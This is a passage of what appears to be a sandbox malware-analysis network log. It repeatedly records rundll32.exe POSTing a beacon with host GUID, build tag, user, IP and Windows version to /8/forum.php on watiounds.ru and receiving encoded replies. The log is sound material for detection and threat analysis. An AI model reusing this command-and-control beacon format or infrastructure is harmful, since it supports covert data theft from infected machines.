                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:14.594840050 CEST | 455 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          376 | 192.168.2.22 | 49541 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:14.916862965 CEST | 456 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.039254904 CEST | 456 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 42 59 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJBYQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          377 | 192.168.2.22 | 49542 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:15.359204054 CEST | 457 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.485290051 CEST | 457 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          378 | 192.168.2.22 | 49543 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:15.810569048 CEST | 458 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.937107086 CEST | 458 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          379 | 192.168.2.22 | 49544 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:16.260979891 CEST | 459 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:16.387821913 CEST | 459 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFFUUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          38 | 192.168.2.22 | 49203 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:40.546120882 CEST | 78 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:40.675393105 CEST | 78 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTAZGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          380 | 192.168.2.22 | 49545 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:16.714250088 CEST | 460 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:16.836950064 CEST | 461 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          381 | 192.168.2.22 | 49546 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:17.142498016 CEST | 461 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:17.265283108 CEST | 462 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCCXXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          382 | 192.168.2.22 | 49547 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:17.593389034 CEST | 463 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:17.715223074 CEST | 463 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJKPQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          383 | 192.168.2.22 | 49548 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:18.040235043 CEST | 464 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:18.166444063 CEST | 464 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          384 | 192.168.2.22 | 49549 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:18.512223959 CEST | 465 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:18.652337074 CEST | 465 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          385 | 192.168.2.22 | 49550 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:18.975775957 CEST | 466 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.099287987 CEST | 466 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          386 | 192.168.2.22 | 49551 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:19.414419889 CEST | 467 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.543034077 CEST | 467 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKYBPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          387 | 192.168.2.22 | 49552 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:19.866071939 CEST | 468 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.991341114 CEST | 468 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQAZJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          388 | 192.168.2.22 | 49553 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:20.322063923 CEST | 469 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:20.449620962 CEST | 470 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTNMGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          389 | 192.168.2.22 | 49554 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:20.772947073 CEST | 470 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:20.895773888 CEST | 471 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQFUJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          39 | 192.168.2.22 | 49204 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:41.014056921 CEST | 79 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:41.142589092 CEST | 79 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          390 | 192.168.2.22 | 49555 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:21.232877970 CEST | 472 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
